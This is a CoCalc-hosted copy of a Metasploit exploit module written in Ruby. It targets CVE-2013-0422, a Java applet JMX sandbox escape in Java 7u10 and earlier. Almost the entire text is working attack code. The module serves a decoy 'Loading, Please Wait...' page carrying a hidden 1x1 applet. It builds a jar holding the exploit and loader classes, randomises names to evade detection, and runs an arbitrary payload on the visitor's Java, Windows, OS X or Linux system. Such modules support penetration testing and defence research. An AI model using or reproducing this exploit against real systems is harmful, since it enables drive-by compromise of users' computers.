Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean.rb
31513 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  include Msf::Exploit::Remote::BrowserAutopwn

13
  autopwn_info({ javascript: false })

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Java Applet JMX Remote Code Execution',

20
        'Description' => %q{

21
          This module abuses the JMX classes from a Java Applet to run arbitrary Java

22
          code outside of the sandbox as exploited in the wild in January of 2013. The

23
          vulnerability affects Java version 7u10 and earlier.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Unknown', # Vulnerability discovery

28
          'egypt', # Metasploit module

29
          'sinn3r', # Metasploit module

30
          'juan vazquez' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'CVE', '2013-0422' ],

34
          [ 'OSVDB', '89059' ],

35
          [ 'US-CERT-VU', '625617' ],

36
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],

37
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],

38
          [ 'URL', 'http://pastebin.com/cUG2ayjh' ] # Who authored the code on pastebin?  I can't read Russian :-(

39
        ],

40
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

41
        'Targets' => [

42
          [

43
            'Generic (Java Payload)',

44
            {

45
              'Platform' => ['java'],

46
              'Arch' => ARCH_JAVA

47
            }

48
          ],

49
          [

50
            'Windows x86 (Native Payload)',

51
            {

52
              'Platform' => 'win',

53
              'Arch' => ARCH_X86

54
            }

55
          ],

56
          [

57
            'Mac OS X x86 (Native Payload)',

58
            {

59
              'Platform' => 'osx',

60
              'Arch' => ARCH_X86

61
            }

62
          ],

63
          [

64
            'Linux x86 (Native Payload)',

65
            {

66
              'Platform' => 'linux',

67
              'Arch' => ARCH_X86

68
            }

69
          ],

70
        ],

71
        'DefaultTarget' => 0,

72
        'DisclosureDate' => '2013-01-10',

73
        'Notes' => {

74
          'Reliability' => UNKNOWN_RELIABILITY,

75
          'Stability' => UNKNOWN_STABILITY,

76
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

77
        }

78
      )

79
    )

80
  end

81


82
  def setup

83
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-0422', 'Exploit.class')

84
    @exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

85
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-0422', 'B.class')

86
    @loader_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

87


88
    @exploit_class_name = rand_text_alpha('Exploit'.length)

89
    @exploit_class.gsub!('Exploit', @exploit_class_name)

90
    super

91
  end

92


93
  def on_request_uri(cli, request)

94
    print_status("handling request for #{request.uri}")

95


96
    case request.uri

97
    when /\.jar$/i

98
      jar = payload.encoded_jar

99
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

100
      jar.add_file('B.class', @loader_class)

101
      metasploit_str = rand_text_alpha('metasploit'.length)

102
      payload_str = rand_text_alpha('payload'.length)

103
      jar.entries.each do |entry|

104
        entry.name.gsub!('metasploit', metasploit_str)

105
        entry.name.gsub!('Payload', payload_str)

106
        entry.data = entry.data.gsub('metasploit', metasploit_str)

107
        entry.data = entry.data.gsub('Payload', payload_str)

108
      end

109
      jar.build_manifest

110


111
      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })

112
    when %r{/$}

113
      payload = regenerate_payload(cli)

114
      if !payload

115
        print_error('Failed to generate the payload.')

116
        send_not_found(cli)

117
        return

118
      end

119
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

120
    else

121
      send_redirect(cli, get_resource + '/', '')

122
    end

123
  end

124


125
  def generate_html

126
    html = %(<html><head><title>Loading, Please Wait...</title></head>)

127
    html += %(<body><center><p>Loading, Please Wait...</p></center>)

128
    html += %(<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">)

129
    html += %(</applet></body></html>)

130
    return html

131
  end

132
end

133


134